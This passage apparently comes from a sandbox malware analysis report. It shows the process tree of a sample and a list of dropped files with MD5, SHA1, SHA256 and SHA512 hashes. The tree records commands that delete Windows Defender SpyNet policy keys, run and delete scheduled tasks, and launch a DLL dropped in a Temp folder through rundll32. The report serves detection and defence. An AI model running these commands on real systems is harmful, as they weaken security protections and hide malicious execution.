C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yWyixlOEsLxsTwFTt"3⤵PID:2060
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:332
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2032
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1180
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:2532
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NDmpcgCvNfyvVRxht"3⤵PID:2216
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\szdKxxrFMiVXCdXj\IekAmSJh\tQaSfTW.dll",#1 /kmsite_idLlz 5254032⤵PID:2604
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\szdKxxrFMiVXCdXj\IekAmSJh\tQaSfTW.dll",#1 /kmsite_idLlz 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2496 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yWyixlOEsLxsTwFTt"4⤵PID:1800
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:964
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2884
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2732
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD584b9fcc539784d364a60d65a6962853b
SHA1745d14d5d4deaeb2e1c8d49699bc63b853c64f91
SHA256d745b7f698f6cdb14d3eb861c12ee378f9d0518366b4c1b31ca4f2a572229095
SHA5125fdd6abe83062578c6210dd2dcd5ac67c4003ab9a62f063aa85a2849803f1b5c085e992b4fe88ccf0bf55e5b8e281e7f6887eb93f14a25f1bd381377221b0b08
-
Filesize
2KB
MD5db9dc34bef1d19f6d1f43946962cf2e5
SHA1e376088f78127dda41b958b922d62b82f2a0beef
SHA256c4c76241f43b5a5766de380f6aea8d9b309381e522dcdde4dbb61b4db09f1651
SHA51209ff7adac53ea0b92f940f94b9eb5699dbb3859e6b8f91f18e4040be092291301de95a1c070a304791b3e292d1b6f9bee916192703bb9876f590d8e469030223
-
Filesize
2KB
MD50b670a22043ee3ff1444cef61a4661fd
SHA13f3c2329fe9fee5eba36dead501925639bb7ed71
SHA2567924bd37502886975c1d863ecd3a59b327cc11db0836f87ebdc00e5d9eb63112
SHA512fdbc57b6ac1adea62028c77f14e69f7db0c82276f2c1b638e40b2f79c73f9b12438156a3afac41098d9c4527df6f58777dd2ad174ca5c0ec81478b57ff84c97f
-
Filesize
2KB
MD57c52fc0fc81e742cf10a6125610ae2f8
SHA1e3a72ab8f091e99ab8b1241c94ac4eb002e73486
SHA256f3f463f32b1378453d010d45b4d41c2b1cf915235ee915905f8500c177d526d4
SHA5120be8c6dcd47517bf0efa3ae72f03fd20fb5d8b767624950b1d6a5073c087f40150fa5c1e78d8ac0a70c145c687893878e8793686d127d9731bede9086699e102
-
Filesize
1.4MB
MD5ead00bec7fb011ee521235b3d2108e04
SHA10fcaf18cb212a31c92dc686cdfb1fad9425a48a0
SHA256f75bdfdfea37b6bb38a85fdde4bde582815dc403fe7f3554cc2d22cc5e2f3899
SHA5126bca717e8272bda8ff4af2fde2bde9f12255e1146d0515ad3af4a0cc2c36d9a5a4b65f7b4fccc2b3370184b0b802f77bed74ce65acc1efca0e36bc2bcfbb4eea
-
Filesize
2KB
MD541c5de14fd1720b1d96a1182fc94dfeb
SHA1829ef68fb215998c057dbfd3dafad5a0298734f0
SHA256113fddd2d19e8381b6df0371bd1207c8fd686571b3b399b648d440ad0848bc24
SHA51253e9875e9973b1bcc8110939bc4369a742b276906c80c9b6708e18c65f2f8bb5627979989444c3f7c939193a36ce5268198c728de29ea79a5205969ec03dff6f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD574ee0e365515a203aec12ae12229c2bc
SHA1c0fa25f96bf51858d1d8b5a0a164c25e34ad48c2
SHA256674cbfe5d2bd82bff4733ae54f4172cd7ed259246fa13ed967571aa73b2da3b3
SHA512752b33fe16443b3a181935beb35ed43e86c3c006d28d6ca479442f68c127ca9bc6829716e4a8bae6e29dc1cdcf9d3ba82101605c0708e39dfe95cb9ce47cc76d
-
Filesize
6.1MB
MD5f4cae6ac1b8134725afadd5775c208e8
SHA1809e509c3392b0d59f00ba72a4453c7415ef8ce1
SHA256ce968022435b48ee3c8a214d0a2c81746f0ff58ac537a3648ab91b13fdce440a
SHA51247cbff1167ce6b661fff4b115009e6c9d67e1cdf2020c59a46528ee654a0072135a790add48100056cff9ada2636e82c1b5b7172c6d7512dc182b28c1bcf1563
-
Filesize
6.1MB
MD5f4cae6ac1b8134725afadd5775c208e8
SHA1809e509c3392b0d59f00ba72a4453c7415ef8ce1
SHA256ce968022435b48ee3c8a214d0a2c81746f0ff58ac537a3648ab91b13fdce440a
SHA51247cbff1167ce6b661fff4b115009e6c9d67e1cdf2020c59a46528ee654a0072135a790add48100056cff9ada2636e82c1b5b7172c6d7512dc182b28c1bcf1563
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51ccfc2e5e1a5e69275d4f1a7dcf01a18
SHA1708899e66f97eca76286139fdc23acc01eabdbf5
SHA256c24bc7c406a8274c99237cd8d1130620fbb68578ad3d10d03572334680996445
SHA512def37f69835c30d3b3331943715dce1e1ada74ad2f83733a63813388871ba9d9403998d70e3552c6cca767ae361c748f31247c0f04f857a9b5a577db5246510f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55cb215913b8673d9f1e4f2a71d31282c
SHA101c5a0630e770f6fd88981c47c42225e3df6eaa8
SHA2560283d042a91d28434e17ab406250608e55adf6961b0f78810a40ad5818b83d2d
SHA5122007dcc51e7286e3143238060119b276f1ae20b1f9a2487c31ae06d7ee094e017a5fb16f55706910db6008cc41696a7543ca5d24051447895e31c8d9f803977b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53a0ee3e2f72c3983ff755922549383fc
SHA1aba0b37ad71726e9919e34be994dd08d02a653c7
SHA256ce0047ced406f58651a6c1ee0086d3a46774b60174a22cf243848f5b63222d46
SHA51275b514bd1035d4d36bb00020d1736d31b643f3a85195e1af67105017af02a0f30f87d2e55956496fff6cc4e30aecbf3b61a5045ad321d57c4acf9d9293427d99
-
Filesize
7KB
MD519d39a215da1713dd5a3ddabad758ce4
SHA1c9540e202d1606e7263bd2ac73ebc02d9a80c7f1
SHA256093a75ed13a23a6618ae3ca0494590f6385cccf89f3c2ac79f52be027e878626
SHA5121c6380d6748cd622a136a22198e9cf22f06810cf315eab1a7b8e791bc458668109db9ef704b1d9bdb0d7197cad660cfe16f3c7217842f2729957064be87c36b0
-
Filesize
6.1MB
MD540f6a2cc59a1b8b2bd8e9f2d3e51e833
SHA184ada4ab4def6dd57e96c9fa70c6699bffc93eb3
SHA256c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1
SHA5123da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7
-
Filesize
9KB
MD5255b9a5ccfc5384c5b366952ec77b15e
SHA155e87a5aae1840eddb53739119e864ce9718f821
SHA256b3bc090dc4e06626777eaf7dc03d39d5d7b6223c2cbf29368b2637131859d3ae
SHA512a561a99850c5043da4ac080206801197f69da0b44ba6b0c11228b4ef95c417a0128cbd4003333bdc6c05c8193faf330732f121d28078bb5792f4d0af4ac6fb56
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6KB
MD59da7fecea8b2d9222aa197a0c745eb3d
SHA11c405d61f571481996bea9b293dad34b1ea059cc
SHA256de8cfd475d49a17b8f50490f644a94bfe1ea87a9b23f4d36a5281670bb4de69b
SHA5127db37fab3373918874be16f292a8a9a3e85809dc019614b6e298a7fa1748c13471b1a053f7cb893215c66f7a95345fce49f8e9dd8270bbf293fcdf333cbfbd0f
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
6.1MB
MD5f4cae6ac1b8134725afadd5775c208e8
SHA1809e509c3392b0d59f00ba72a4453c7415ef8ce1
SHA256ce968022435b48ee3c8a214d0a2c81746f0ff58ac537a3648ab91b13fdce440a
SHA51247cbff1167ce6b661fff4b115009e6c9d67e1cdf2020c59a46528ee654a0072135a790add48100056cff9ada2636e82c1b5b7172c6d7512dc182b28c1bcf1563
-
Filesize
6.1MB
MD5f4cae6ac1b8134725afadd5775c208e8
SHA1809e509c3392b0d59f00ba72a4453c7415ef8ce1
SHA256ce968022435b48ee3c8a214d0a2c81746f0ff58ac537a3648ab91b13fdce440a
SHA51247cbff1167ce6b661fff4b115009e6c9d67e1cdf2020c59a46528ee654a0072135a790add48100056cff9ada2636e82c1b5b7172c6d7512dc182b28c1bcf1563
-
Filesize
6.1MB
MD5f4cae6ac1b8134725afadd5775c208e8
SHA1809e509c3392b0d59f00ba72a4453c7415ef8ce1
SHA256ce968022435b48ee3c8a214d0a2c81746f0ff58ac537a3648ab91b13fdce440a
SHA51247cbff1167ce6b661fff4b115009e6c9d67e1cdf2020c59a46528ee654a0072135a790add48100056cff9ada2636e82c1b5b7172c6d7512dc182b28c1bcf1563
-
Filesize
6.1MB
MD5f4cae6ac1b8134725afadd5775c208e8
SHA1809e509c3392b0d59f00ba72a4453c7415ef8ce1
SHA256ce968022435b48ee3c8a214d0a2c81746f0ff58ac537a3648ab91b13fdce440a
SHA51247cbff1167ce6b661fff4b115009e6c9d67e1cdf2020c59a46528ee654a0072135a790add48100056cff9ada2636e82c1b5b7172c6d7512dc182b28c1bcf1563
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
Filesize
6.1MB
MD540f6a2cc59a1b8b2bd8e9f2d3e51e833
SHA184ada4ab4def6dd57e96c9fa70c6699bffc93eb3
SHA256c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1
SHA5123da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7
-
Filesize
6.1MB
MD540f6a2cc59a1b8b2bd8e9f2d3e51e833
SHA184ada4ab4def6dd57e96c9fa70c6699bffc93eb3
SHA256c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1
SHA5123da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7
-
Filesize
6.1MB
MD540f6a2cc59a1b8b2bd8e9f2d3e51e833
SHA184ada4ab4def6dd57e96c9fa70c6699bffc93eb3
SHA256c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1
SHA5123da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7
-
Filesize
6.1MB
MD540f6a2cc59a1b8b2bd8e9f2d3e51e833
SHA184ada4ab4def6dd57e96c9fa70c6699bffc93eb3
SHA256c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1
SHA5123da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7